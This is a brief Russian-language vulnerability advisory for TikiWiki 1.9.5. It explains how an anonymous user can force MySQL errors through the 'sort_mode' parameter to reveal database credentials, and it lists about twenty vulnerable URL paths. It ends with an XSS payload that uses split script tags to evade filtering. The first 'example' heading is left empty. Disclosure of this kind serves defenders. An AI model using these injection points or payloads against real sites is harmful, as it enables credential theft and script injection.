Программа: tikiwiki 1.9.5
Уязвимость позволяет удаленному злоумышленнику осуществить XSS нападение и получить логин и пароль пользователя базы данных mysql. Уязвимость существует из-за ошибки, позволяющей анонимному пользователю получить логин и пароль пользователя mysql, вызвав в mysql ошибку с использованием переменной "sort_mode" совместно со следующими ссылками:
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=
Пример:
Атакующий также может осуществить XSS нападение на уязвимую систему.
Пример:
/tiki-featured_link.php?type=f&url=" ></iframe><scr</script> ipt>alert('XSS')</scri</script>pt> <!--
